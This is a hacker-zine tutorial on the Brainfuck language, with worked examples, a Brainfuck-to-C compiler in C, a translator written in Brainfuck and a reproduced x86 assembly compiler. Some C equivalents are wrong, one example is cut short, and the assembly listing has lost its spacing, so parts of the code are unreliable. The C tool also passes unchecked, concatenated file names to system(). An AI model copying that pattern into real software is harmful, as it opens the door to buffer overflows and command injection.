Well, thats what they say anyways, i hardly consider that a program, because
all it does is enter a loop that decreases the value stored at the current
memory pointer until it reaches zero. then exits the loop. But since all memory
blocks start out at zero, it will never enter that loop. So lets write a real
program.
+++++[-]
This is equivalent in C to:
*p=+5;
while(*p != 0){
*p--;
}
In that program we are incrementing the current memory pointers value to 5,
then entering a loop that decreases the value located at the memory pointer
till it is zero, then exits the loop.
>>>>++
This will move the memory pointer to the fourth memory block, and increment
the value stored there by 2. So it looks like
memory blocks
-------------
[0][0][0][2][0][0]...
^
memory pointer
As you can see in the 'k-rad' ASCII diagram, our memory pointer points to
the fourth memory block, and it incremented the value there by 1. since
there was nothing there before, it now contains the value: 2. If we take
that same program, and add more onto the end of it like:
>>>>++<<+>>+
At the end of our program, our memory layout will look like this:
memory blocks
-------------
[0][1][0][3][0][0]...
^
memory pointer
The pointer was moved to the fourth block, incremented the value by 2,
moved back 2 blocks to the second block, incremented the valued stored
there by 1, and then the pointer moved 2 blocks to the right again to the
fourth block and incremented the value stored there by one. And at the end
of the program the memory pointer lies back on the fourth memory block.
That is fine and dandy, but we can't really see anything. So lets write a
program that will produce actual output.
When cavemen started scrawling shit on the walls, the first ever
picture drawn was a man waving at a picture of the planet earth. I am not about
to break that trend. so i present "Hello World!" in brainfuck.
>+++++++++[<++++++++>-]<.>+++++++[<++++>-]<+.+++++++..+++.[-]
>++++++++[<++++>-] <.>+++++++++++[<++++++++>-]<-.--------.+++
.------.--------.[-]>++++++++[<++++>- ]<+.[-]++++++++++.
We must remember that we are working with numbers, so we must use a character's
ASCII decimal number to represent it. then when we print it, will print the
value as an ASCII character. Lets break this program down.
>+++++++++[<++++++++>-]<.
Lets break this part down farther using our diagrams.
>
First you can see, that we increment the memory pointer to the next memory
block leaving the first memory block at zero.
memory blocks
-------------
[0][0][0][0][0][0]...
^
memory pointer
We then increase the value at our current memory block to 9.
+++++++++
Leaving our diagram like this:
memory blocks
-------------
[0][9][0][0][0][0]...
^
memory pointer
Since the block we are on contains a non-zero value, we then enter the loop.
[
Now that we are in the loop Then we move the memory pointer one block to the
left
<
Which gives us:
memory blocks
-------------
[0][9][0][0][0][0]...
^
memory pointer
And we increment the memory blocks stored value by 8.
++++++++
So our diagram looks like:
memory blocks
-------------
[8][9][0][0][0][0]...
^
memory pointer
Then we move the memory pointer one block to the right, to the second memory
block again, and decrease the value stored there from 9 to 8.
>-
Diagram:
memory blocks
-------------
[8][8][0][0][0][0]...
^
memory pointer
We then hit the end of our loop.
]
It checks to see if the memory block the pointer currently points to contains
the value zero, but current memory block's stored value is not zero, so the
loop starts over. Moving the pointer to the left. Increasing it by 8, and
moving the pointer to the right. and decreasing it by 1. After the 2nd pass of
all that, our diagram now looks like:
memory blocks
-------------
[16][7][0][0][0][0]...
^
memory pointer
It will continue this process over and over until the value stored at the second
memory block is zero. It then exits the loop. Once we have exited the loop. The
program moves the pointer back to the first memory block one final time, and
prints the value stored there. If you followed that, you would see that we in-
creased the first memory blocks stored value by 8, 9 times. We know that 8*9=72
and 72 is the ASCII decimal value for 'H'.
<.
And the diagram:
memory blocks
-------------
[72][0][0][0][0][0]...
^
memory pointer
call the print function. and 'H' is printed to the console.
Wow...that was a lot of freaking work just to print one single character. Why
you may ask would you want to waste your time programming is this horribly
inefficient programming language?!? Well, because some of us hackers that
actually like to do fun and challenging things to expand our minds and make us
think and
aren't just out to hax0r up a gibson or two to show everyone who's teh 1337.
Anyways, carrying on...
If we were to write that in C, it would be like:
++p;
*p=+9;
while(*p != 0){
--p;
*p=+8;
--p;
--*p;
}
--p;
putchar(*p);
I'm going to leave it up to you to figure out how the rest of that is printing
out "Hello World!" But from that you should have the basics of memory pointer
and value manipulation.
--[ 3 ] INPUT
Input in brainfuck is controlled by the ',' operator. It will get a character
and store its ASCII decimal value to the current memory block that the memory
pointer points to. Lets experiment with it a bit.
Remember, when you use the input operator, you are actually storing the decimal
ASCII value of the character you press on the keyboard. So pressing 2 for input
isn't actually storing 2. Its storing the decimal value of the ASCII char '2',
which is decimal 50.
,.,.,.
This will take in 3 characters and print them out. Lets write something more complex.
>,[>,]<[<]>[.>]
This is a program that will act like the UNIX cat command. It will read in from
STDIN and output to STDOUT. Lets break it down.
>,
Move the memory pointer the the second memory block leaving the first block
with a value of zero. Input a value and store it at the current memory pointer
location which is the second memory block.
[>,]
Begin a loop that will move the pointer up a memory block, and Input a value
and store it there. This will repeat until it encounters a NULL character (\0
or decimal value of zero);
<[<]
Rewind. Once we've made it to this point in the program, it means that we have
encountered a NULL character. So in order to start our loop, we need to move
the memory pointer one memory block backwards so that we have a non-zero value
stored there. Once there, the loops starts, and moves the memory pointer one
block to the left until we reach the first memory block, which we left with a
value of zero at the beginning of the program. Once it reaches the first
memory block with the value of zero, the loop exits.
>[.>]
Now we mover our memory pointer to the right one space, so we are now on a
memory block containing a non-zero value. We enter a loop and proceed to print
the current value stored, then move the memory pointer to the right. We contin-
ue to do this until we come to a memory block containing a NULL character (zero)
and then the loop exits.
this program in C would be like:
++p;
*p=getchar();
while(*p != 0){
++p;
*p=getchar();
}
--p;
while(*p != 0) --p;
++p;
while(*p != 0){
putchar(*p);
++p;
}
Now that we are able to input/output and manipulate our memory, there is
already a wealth of programs you could write.
--[ 4 ] TRICKS
There are many little tricks you can use in brainfuck to make it easier. I will
try to cover ones i have figure out.
How to move or shift a value from one memory block to another:
+++++[>>+<<-]
This will set the first memory block to the value of 5. It then starts a loop
that will copy the value stored in the first block, to the third memory block.
Leaving the first memory block empty again.
How to copy from one memory block to another:
+++++[>>+>+<<<-]>>>[<<<+>>>-]
This little program sets the first memory block to the value of 5. Then it goes
and copies that value to the 3rd memory block and 4th memory block, leaving the
first memory block empty. It then moves the value from the 4th memory block
back to the first one, leaving the 4th block empty.
Addition of 2 memory blocks and easily be done as well.
+++++>+++[<+>-]
We increment the first block to 5. Move the pointer the the right one block,
and then increment that block by three. We want to add the second memory block
to the first one. So we enter a loop that will move the pointer to the left one
block, add one, then move it to the right 1 block and subtract one.
Subtraction of one block from another is just as easy.
+++++++>+++++[<-
We increment the first block to 7, move to the right one block, increment it by
5, then we begin a loop that will move the pointer to the left and subtract one
then move the pointer back to the right and decrease the value stored there.
Doing this until we have subtracted 5 from 7.
Multiplication we have covered before in our hello world program, but i will go
over it again right here.
+++[>+++++<-]
We just incremented the first blocks value to 3, then started a loop that will
move the pointer to the right one block, add 5, then move the pointer back to
the left one block and subtract one. This will accomplish multiplying 5 by 3
and leave the value stored at the second memory block at 15.
division is the same, but we subtract instead.
--[ 5 ] IF STATEMENTS
If statements took a while for me to get the hang of, but after a while they
finally just clicked for me. Basically if you think about it, an if statement is
just testing whether a condition is TRUE or FALSE. That is to say zero or non-
zero. So i will try to show them the best i can, as conditional statements in
BrainFuck seem to be one of the less documented things about the language.
Say we want to input into memory block 1. Then we would like to test if the
input value (x) was equal to 5, and if so, set y to 3. There are two ways to
do this, one is the destructive flow control, where it diminishes the value you
are test. The other obviously non-destructive flow control. where you variable
stays intact.
here is non destructive:
in C:
x=getchar;
if(x == 5){
y = 3;
}
In BrainFuck:
,[>>+>+<<<-]>>>[<<<+>>>-]>+<<[-----[>]>>[<<<+++>>>[-]]
Once again, lets break that down to hopefully explain that better. Run though
this twice. Once as we go along assuming the value 6 was entered, and once
assuming the value 5 was entered. Also, remember, Brainfuck will _only_ enter
as loop if the value in the block that the pointer is currently on is non-zero.
If the value at the block is zero, then it will skip over that loop and ignore
it. And the same goes while in a loop. If when it reaches the other end of that
loop ( ] ), if the value stored at the block where the pointer is currently at
is zero, it will exit the loop and continue on with the program.
input into x.
,
1 2 3 4 5 6
[x][y][0][0][0][0]...
^
memory pointer
copy from block 1, to block 3, using block 4 as a temp storage. We end on block
number 4.
[>>+>+<<<-]>>>[<<<+>>>-]
1 2 3 4 5 6
[x][y][x][0][0][0]
^
memory pointer
set block 5 to 1. This will be our block to test for true of false. Then move
the pointer back to 3.
>+<<
1 2 3 4 5 6
[x][y][x][0][1][0]
^
memory pointer
Now subtract 5 and if x was 5 set y to 3 and then move the pointer back over
to block 5 and set back to zero so that the loop will only run once. If x was
not equal to 5, then the pointer will end up resting on memory block 6.
[-----[>]>>[<<<+++>>>[-]]
if x was 5:
1 2 3 4 5 6
[x][3][0][0][0][0]...
^
memory pointer
if x was not 5
1 2 3 4 5 6
[x][y][x][0][1][0]...
^
memory pointer
That was the non destructive way to do an if statement. The destructive way
would be to just subtract from the input variable directly instead of copying
it. this will lead to much shorter code. Lets test x for the value 5 again
and set y to 3 if it is.
Destructive way:
>>+[<<,-----[>]>>[<<+++>>[-]]]
Well I hope you enjoyed learning how to program in BrainFuck as much as i did.
Thats all i have to write about for now. Maybe I'll write another paper later
on with more advanced techniques as i figure them out. Until then, here are
some challenges to give you something to program in brainfuck:
1. Write a program to print your name.
2. Write a program to print all printable ASCII characters.
3. (From BrainFuck Golf) Write a program that will take a NULL ('\0') termina-
ted string as input, and output source code for a BrainFuck program that
when compiled and ran, will print the string input into the first program.
(yes, this sounds like a doozy, but I've actually done this in 1 of code).
--[ 6 ] BRAINFUCK-TO-C INTERPRETOR
Here is the source for a Brainfuck to C interpretor and front end compiler
written in C that i wrote when first learning the how to program in brainfuck.
Or if you really would like to see something, below the C version is a Brain-
Fuck to C interpretor that i wrote...in BrainFuck!
----------8<--------[cut]-----------8<----------------------------------------
/*
* obfc.c
* The "omin0us brainfuck compiler"
* omin0us <omin0us208@gmail.com>
* <http://dtors.ath.cx>
* A simple BrainFuck to C interpretor and font end Compiler.
*
* This program is free software; you can
* redistribute it and/or modify it under the
* terms of the GNU General Public License as
* published by the Free Software Foundation;
* either version 2 of the License or (at
* your option) any later version;
*
* This program is distributed in the hope
* that it will be useful but WITHOUT ANY
* WARRANTY; without even the implied
* warranty of MERCHANTABILITY or FITNESS FOR
* A PARTICULAR PURPOSE; See the GNU General
* Public License for more details;
*
* You may find a copy of the GNU General Public
* License on my web site at:
* http://dtors.ath.cx/gpl.txt
* or from the Free Software Foundation's web site at:
* http://www.fsf.org/licenses/gpl.html
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#define CC "/usr/bin/gcc"
void usage(char **argv);
void generate(char *c_output_name);
FILE *outfile;
FILE *infile;
int main(int argc, char **argv){
char c;
char *output_name; /* name of the executable that will be made */
char *c_output_name; /* name of the C source file that is generated */
char compile_opts[256] = CC; /* this array will contain the compiler options */
int keep_file = 0; /* Keep the generated C source file? */
int verbose = 0; /* Use verbose output? */
int no_compile = 0; /* Don't compile, just generate C source file */
if(argc < 2){
usage(argv);
exit(1);
}
/* chk(argv); */
while(1){
c = getopt(argc, argv, "o:c:knvh");
if(c < 0) break;
switch(c){
case 'o':
output_name = optarg;
break;
case 'v':
verbose = 1;
break;
case 'h':
usage(argv);
break;
case 'k':
keep_file = 1;
break;
case 'c':
c_output_name = optarg;
break;
case 'n':
no_compile = 1;
keep_file = 1;
break;
}
}
if((optind >= argc) || (strcmp(argv[optind], "-") == 0)){
fprintf(stderr, "%s: no input file specified\n", argv[0]);
usage(argv);
exit(-1);
}
if(verbose)printf("[+] Opening %s...", argv[optind]);
if((infile = fopen(argv[optind], "r")) == 0){
if(verbose)printf("failed\n");
fprintf(stderr,"%s: could not open %s\n", argv[0], argv[optind]);
exit(-1);
}
if(verbose)printf("Ok\n");
if(!c_output_name)
c_output_name = "bf.out.c";
if(!output_name)
output_name = "bf.out";
if(verbose)printf("[+] Opening the output file...");
if((outfile = fopen(c_output_name, "w")) == 0){
if(verbose)printf("failed\n");
fprintf(stderr, "%s: error opening output file %s\n", argv[0],
c_output_name);
exit(-1);
}
if(verbose)printf("Ok\n");
if(verbose)printf("[+] Generating C source...");
generate(c_output_name);
if(verbose)printf("Ok\n");
fclose(outfile);
/*strcat(compile_opts, "/usr/bin/gcc");*/
strcat(compile_opts, " -o ");
strcat(compile_opts, output_name);
strcat(compile_opts, " ");
strcat(compile_opts, c_output_name);
if(!no_compile){
if(verbose){
printf("[+] Compiling...\n");
printf("Compiler: " CC "\n");
printf("Compile Options: %s\n", compile_opts);
}
system(compile_opts);
if(verbose)printf("Compiling Complete\n");
}
if(!keep_file){
if(verbose)printf("[+] Deleting intermediate file %s...", c_output_name);
unlink(c_output_name);
if(verbose)printf("Ok\n");
}
else
if(verbose)printf("[+] Keeping intermediate file %s...Ok\n",
c_output_name);
fclose(infile);
return(0);
}
void generate(char *c_output_name){
char c;
fprintf(outfile, "/*\n * This source was automatically generated with");
fprintf(outfile, "\n * obfc - The \"omin0us brainfuck compiler\".");
fprintf(outfile, "\n * omin0us <omin0us208@gmail.com>");
fprintf(outfile, "\n * <http://dtors.ath.cx>\n */\n");
fprintf(outfile, "#include <stdio.h>\n");
fprintf(outfile, "main() {\nchar a[30000],*ptr=a;\n");
while((c=fgetc(infile)) != EOF){
switch(c){
case '>': fprintf(outfile, "ptr++;\n"); break;
case '<': fprintf(outfile, "ptr--;\n"); break;
case '+': fprintf(outfile, "++*ptr;\n"); break;
case '-': fprintf(outfile, "--*ptr;\n"); break;
case '[': fprintf(outfile, "while(*ptr){\n"); break;
case ']': fprintf(outfile, "}\n"); break;
case '.': fprintf(outfile, "putchar(*ptr);\n"); break;
case ',': fprintf(outfile, "*ptr=getchar();\n"); break;
}
}
fprintf(outfile,"exit(0);\n}\n");
}
void usage (char *argv[]){
printf("obfc - the \"omin0us brainfuck compiler\"\n");
printf("by omin0us <omin0us208@gmail.com\n");
printf("<http://dtors.ath.cx>\n");
printf("Usage: %s [OPTIONS] [FILE]\n",argv[0]);
printf("Available Options:\n");
printf("\t-o outfile\tspecify output file name\n");
printf("\t-k\t\tkeep the generated C source (normally bf.out.c)\n");
printf("\t-c c_outfile\tspecify C source file name. Only used option-\n");
printf("\t\t\tally in conjunction with -k option\n");
printf("\t-n\t\tDon't compile the C source, just output a copy of it\n");
printf("\t-v\t\tverbose output\n");
printf("\t-h\t\tdisplay help\n");
}
----------8<--------[cut]-----------8<----------------------------------------
Here is an interpreter that i wrote in BrainFuck.
----------8<--------[cut]-----------8<----------------------------------------
[/* bf2c.b
* The omin0us Brainfuck to C interpretor
* omin0us <omin0us208@gmail.com>
*
* NOTE: This was written just before the release of K-1ine #44
* and consequently was rushed to be finished. Currently
* it does not take well to any characters of input besides
* the 8 standard brainfuck operators and newline and EOF.
* So consequently, it will only interpret un-commented code.
* Check my web site <http://dtors.ath.cx> for a later release
* that will probably have support for commented code.
*/]
>+++++[>+++++++<-]>.<<++[>+++++[>+++++++<-]<-]>>.+++++.<++[>-----<-]>-.<++
[>++++<-]>+.<++[>++++<-]>+.[>+>+>+<<<-]>>>[<<<+>
>>-]<<<<<++[>+++[>---<-]<-
]>>+.+.<+++++++[>----------<-]>+.<++++[>+++++++<-]>.>.-------.-----.<<++[>
>+++++<<-]>>.+.----------------.<<++[>-------<-]>.>++++.<<++[>++++++++<-]>
.<++++++++++[>>>-----------<<<-]>>>+++.<-----.+++++.-------.<<++[>>+++++++
+<<-]>>+.<<+++[>----------<-]>.<++[>>--------<<-]>>-.------.<<++[>++++++++
<-]>+++.---....>++.<----.--.<++[>>+++++++++<<-]>>+.<<++[>+++++++++<-]>+.<+
+[>>-------<<-]>>-.<--.>>.<<<+++[>>++++<<-]>>.<<+++[>>----<<-]>>.++++++++.
+++++.<<++[>---------<-]>-.+.>>.<<<++[>>+++++++<<-]>>-.>.>>>[-]>>[-]<+[<<[
-],[>>>>>>>>>>>>>+>+<<<<<<<<<<<<<<-]>>>>>>>>>>>>>>[<<<<<<<<<<<<<<+>>>>>>>>
>>>>>>-]<<+>[-[-[-[-[-[-[-[-[-[-[-[-[-[-[-[-[-[-[-[-[-[-[-[-[-[-[-[-[-[-[-
[-[-[-[-[-[-[-[-[-[-[-[<->[-]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]<[
<<<<<<<<<<<<[-]>>>>>>>>>>>>[-]]<<<<<<<<<<<<[<+++++[>---------<-]>++[>]>>[>
+++++[>+++++++++<-]>--..-.<+++++++[>++++++++++<-]>.<+++++++++++[>-----<-]>
++.<<<<<<.>>>>>>[-]<]<<<[-[>]>>[>++++++[>+++[>++++++<-]<-]>>++++++.-------
------.----.+++.<++++++[>----------<-]>.++++++++.----.<++++[>+++++++++++++
++++<-]>.<++++[>-----------------<-]>.+++++.--------.<++[>+++++++++<-]>.[-
]<<<<<<<.>>>>>]<<<[-[>]>>[>+++++[>+++++++++<-]>..---.<+++++++[>++++++++++<
-]>.<+++++++++++[>-----<-]>++.<<<<<<.>>>>>>[-]<]<<<[-[>]>>[>+++[>++++[>+++
+++++++<-]<-]>>-.-----.---------.<++[>++++++<-]>-.<+++[>-----<-]>.<++++++[
>----------<-]>-.<+++[>+++<-]>.-----.<++++[>+++++++++++++++++<-]>.<++++[>-
----------------<-]>.+++++.--------.<++[>+++++++++<-]>.[-]<<<<<<<.>>>>>]<<
<[<+++[>-----<-]>+[>]>>[>+++++[>+++++++++<-]>..<+++++++[>++++++++++<-]>---
.<+++++[>----------<-]>---.<<<<<<.>>>>>>[-]<]<<<[--[>]>>[>+++++[>+++++++++
<-]>--..<+++++++[>++++++++++<-]>-.<+++++[>----------<-]>---.[-]<<<<<<.>>>>
>]<<<[<+++[>----------<-]>+[>]>>[>+++[>++++[>++++++++++<-]<-]>>-.<+++[>---
--<-]>.+.+++.-------.<++++++[>----------<-]>-.++.<+++++++[>++++++++++<-]>.
<+++++++[>----------<-]>-.<++++++++[>++++++++++<-]>++.[-]<<<<<<<.>>>>>]<<<
[--[>]>>[>+++++[>+++++[>+++++<-]<-]>>.[-]<<<<<<<.>>>>>]<<<[<++++++++++[>--
--------------<-]>--[>]>>[<<<<[-]]]]]]]]]]]>>]<++[>+++++[>++++++++++<-]<-]
>>+.<+++[>++++++<-]>+.<+++[>-----<-]>.+++++++++++.<+++++++[>----------<-]>
------.++++++++.-------.<+++[>++++++<-]>.<++++++[>+++++++++++<-]>.<+++++++
+++.
----------8<--------[cut]-----------8<----------------------------------------
And lastly, here is a BrainFuck compiler written in x86 assembly by
Brian Raiter
----------8<--------[cut]-----------8<----------------------------------------
;; bf.asm: Copyright (C) 1999-2001 by Brian Raiter, under the GNU
;; General Public License (version 2 or later). No warranty.
;;
;; To build:
;;nasm -f bin -o bf bf.asm && chmod +x bf
;; To use:
;;bf < foo.b > foo && chmod +x foo
BITS 32
;; This is the size of the data area supplied to compiled programs.
%define arraysize30000
;; For the compiler, the text segment is also the data segment. The
;; memory image of the compiler is inside the code buffer, and is
;; modified in place to become the memory image of the compiled
;; program. The area of memory that is the data segment for compiled
;; programs is not used by the compiler. The text and data segments of
;; compiled programs are really only different areas in a single
;; segment, from the system's point of view. Both the compiler and
;; compiled programs load the entire file contents into a single
;; memory segment which is both writable and executable.
%defineTEXTORG0x45E9B000
%defineDATAOFFSET0x2000
%defineDATAORG(TEXTORG + DATAOFFSET)
;; Here begins the file image.
orgTEXTORG
;; At the beginning of the text segment is the ELF header and the
;; program header table, the latter consisting of a single entry. The
;; two structures overlap for a space of eight bytes. Nearly all
;; unused fields in the structures are used to hold bits of code.
;; The beginning of the ELF header.
db0x7F, "ELF"; ehdr.e_ident
;; The top(s) of the main compiling loop. The loop jumps back to
;; different positions, depending on how many bytes to copy into the
;; code buffer. After doing that, esi is initialized to point to the
;; epilog code chunk, a copy of edi (the pointer to the end of the
;; code buffer) is saved in ebp, the high bytes of eax are reset to
;; zero (via the exchange with ebx), and then the next character of
;; input is retrieved.
emitputchar:addesi, byte (putchar - decchar) - 4
emitgetchar:lodsd
emit6bytes:movsd
emit2bytes:movsb
emit1byte:movsb
compile:leaesi, [byte ecx + epilog - filesize]
xchgeax, ebx
cmpeax, 0x00030002; ehdr.e_type (0x0002)
; ehdr.e_machine (0x0003)
movebp, edi; ehdr.e_version
jmpshort getchar
;; The entry point for the compiler (and compiled programs), and the
;; location of the program header table.
dd_start; ehdr.e_entry
ddproghdr - $$; ehdr.e_phoff
;; The last routine of the compiler, called when there is no more
;; input. The epilog code chunk is copied into the code buffer. The
;; text origin is popped off the stack into ecx, and subtracted from
;; edi to determine the size of the compiled program. This value is
;; stored in the program header table, and then is moved into edx.
;; The program then jumps to the putchar routine, which sends the
;; compiled program to stdout before falling through to the epilog
;; routine and exiting.
eof:movsd; ehdr.e_shoff
xchgeax, ecx
popecx
subedi, ecx; ehdr.e_flags
xchgeax, edi
stosd
xchgeax, edx
jmpshort putchar; ehdr.e_ehsize
;; 0x20 == the size of one program header table entry.
dw0x20; ehdr.e_phentsize
;; The beginning of the program header table. 1 == PT_LOAD, indicating
;; that the segment is to be loaded into memory.
proghdr:dd1; ehdr.e_phnum & phdr.p_type
; ehdr.e_shentsize
dd0; ehdr.e_shnum & phdr.p_offset
; ehdr.e_shstrndx
;; (Note that the next four bytes, in addition to containing the first
;; two instructions of the bracket routine, also comprise the memory
;; address of the text origin.)
db0; phdr.p_vaddr
;; The bracket routine emits code for the "[" instruction. This
;; instruction translates to a simple "jmp near", but the target of
;; the jump will not be known until the matching "]" is seen. The
;; routine thus outputs a random target, and pushes the location of
;; the target in the code buffer onto the stack.
bracket:moval, 0xE9
incebp
pushebp; phdr.p_paddr
stosd
jmpshort emit1byte
;; This is where the size of the executable file is stored in the
;; program header table. The compiler updates this value just before
;; it outputs the compiled program. This is the only field in the two
;; headers that differs between the compiler and its compiled
;; programs. (While the compiler is reading input, the first byte of
;; this field is also used as an input buffer.)
filesize:ddcompilersize; phdr.p_filesz
;; The size of the program in memory. This entry creates an area of
;; bytes, arraysize in size, all initialized to zero, starting at
;; DATAORG.
ddDATAOFFSET + arraysize; phdr.p_memsz
;; The code chunk for the "." instruction. eax is set to 4 to invoke
;; the write system call. ebx, the file handle to write to, is set to
;; 1 for stdout. ecx points to the buffer containing the bytes to
;; output, and edx equals the number of bytes to output. (Note that
;; the first byte of the first instruction, which is also the least
;; significant byte of the p_flags field, encodes to 0xB3. Having the
;; 2-bit set marks the memory containing the compiler, and its
;; compiled programs, as writeable.)
putchar:movbl, 1; phdr.p_flags
moval, 4
int0x80; phdr.p_align
;; The epilog code chunk. After restoring the initialized registers,
;; eax and ebx are both zero. eax is incremented to 1, so as to invoke
;; the exit system call. ebx specifies the process's return value.
epilog:popa
inceax
int0x80
;; The code chunks for the ">", "<", "+", and "-" instructions.
incptr:incecx
decptr:dececx
incchar:incbyte [ecx]
decchar:decbyte [ecx]
;; The main loop of the compiler continues here, by obtaining the next
;; character of input. This is also the code chunk for the ","
;; instruction. eax is set to 3 to invoke the read system call. ebx,
;; the file handle to read from, is set to 0 for stdin. ecx points to
;; a buffer to receive the bytes that are read, and edx equals the
;; number of bytes to read.
getchar:moval, 3
xorebx, ebx
int0x80
;; If eax is zero or negative, then there is no more input, and the
;; compiler proceeds to the eof routine.
oreax, eax
jleeof
;; Otherwise, esi is advanced four bytes (from the epilog code chunk
;; to the incptr code chunk), and the character read from the input is
;; stored in al, with the high bytes of eax reset to zero.
lodsd
moveax, [ecx]
;; The compiler compares the input character with ">" and "<". esi is
;; advanced to the next code chunk with each failed test.
cmpal, '>'
jzemit1byte
incesi
cmpal, '<'
jzemit1byte
incesi
;; The next four tests check for the characters "+", ",", "-", and
;; ".", respectively. These four characters are contiguous in ASCII,
;; and so are tested for by doing successive decrements of eax.
subal, '+'
jzemit2bytes
deceax
jzemitgetchar
incesi
incesi
deceax
jzemit2bytes
deceax
jzemitputchar
;; The remaining instructions, "[" and "]", have special routines for
;; emitting the proper code. (Note that the jump back to the main loop
;; is at the edge of the short-jump range. Routines below here
;; therefore use this jump as a relay to return to the main loop;
;; however, in order to use it correctly, the routines must be sure
;; that the zero flag is cleared at the time.)
cmpal, '[' - '.'
jzbracket
cmpal, ']' - '.'
relay:jnzcompile
;; The endbracket routine emits code for the "]" instruction, as well
;; as completing the code for the matching "[". The compiler first
;; emits "cmp dh, [ecx]" and the first two bytes of a "jnz near". The
;; location of the missing target in the code for the "[" instruction
;; is then retrieved from the stack, the correct target value is
;; computed and stored, and then the current instruction's jmp target
;; is computed and emitted.
endbracket:moveax, 0x850F313A
stosd
leaesi, [byte edi - 8]
popeax
subesi, eax
mov[eax], esi
subeax, edi
stosd
jmpshort relay
;; This is the entry point, for both the compiler and its compiled
;; programs. The shared initialization code sets eax and ebx to zero,
;; ecx to the beginning of the array that is the compiled programs's
;; data area, and edx to one. (This also clears the zero flag for the
;; relay jump below.) The registers are then saved on the stack, to be
;; restored at the very end.
_start:
xoreax, eax
xorebx, ebx
movecx, DATAORG
cdq
incedx
pusha
;; At this point, the compiler and its compiled programs diverge.
;; Although every compiled program includes all the code in this file
;; above this point, only the eleven bytes directly above are actually
;; used by both. This point is where the compiler begins storing the
;; generated code, so only the compiler sees the instructions below.
;; This routine first modifies ecx to contain TEXTORG, which is stored
;; on the stack, and then offsets it to point to filesize. edi is set
;; equal to codebuf, and then the compiler enters the main loop.
codebuf:
movch, (TEXTORG >> 8) & 0xFF
pushecx
movcl, filesize - $$
leaedi, [byte ecx + codebuf - filesize]
jmpshort relay
;; Here ends the file image.
compilersizeequ$ - $$
----------8<--------[cut]-----------8<----------------------------------------
EOF
-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-
-
<sub> omin0us has a puppy
<sub> it cries
<sub> animals often take after their owners
-
-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-
-- Credits
Without the following contributions, this zine issue would be fairly
delayed or not released. So thank you to the following people:
Aestetix, Aftermath, CYB0RG/ASM, Fractal, H1D30U5, Jackel,
Kybo Ren, MsOgynis, Omin0us, Sub, The Clone, and Tr00per
-- Shouts:
CYB0RG/ASM, Fractal, H410G3n, The Question, Phlux, Magma, Hack Canada,
The Grasshopper Unit, port9, H1D30U5, Nyxojaele, Ms.O, Tr00per, Flopik,
jimmiejaz, oz0n3, *Senorita Chandelier*, Prologic, Kankraka, Markcore,
cyburnetiks, coercion, tek, persephone, the irc #hackcanada channel,
The Nettwerked Meeting Crew, and the entire (active) Canadian H/P scene.
;. .;.. ; ;. ;..
;.. .;..; .;.; .;; ;..
.;..;. .;..; .;.;...; ;..;..
.;. A .;. .;.
;.. N E T T W E R K E D ;..
;..;.. P R O D U C T ;..;..
.;..; ;..;..
; .;..;.;.. .; . .;. ..;..
.;.. . .; ..;..;..;.. .;
;..;. .;.. . .;.. .;.;.
..;. ..;.. .;. ;.;..;;..;.;
;.;;..;.. ;.;.; .; .
;.;..;. .;. ;.;:.;.
,;....;.
.;.;. .;.;
.;.;.;
.;.;
;..;.
.;.;;.; .;. ..;;. > > > "When I was a child, I spake as a child,
I understood as a child, I thought as
a child: but when I became a man, I put
away childish things."
- Cereal Killer, Hackers, 1995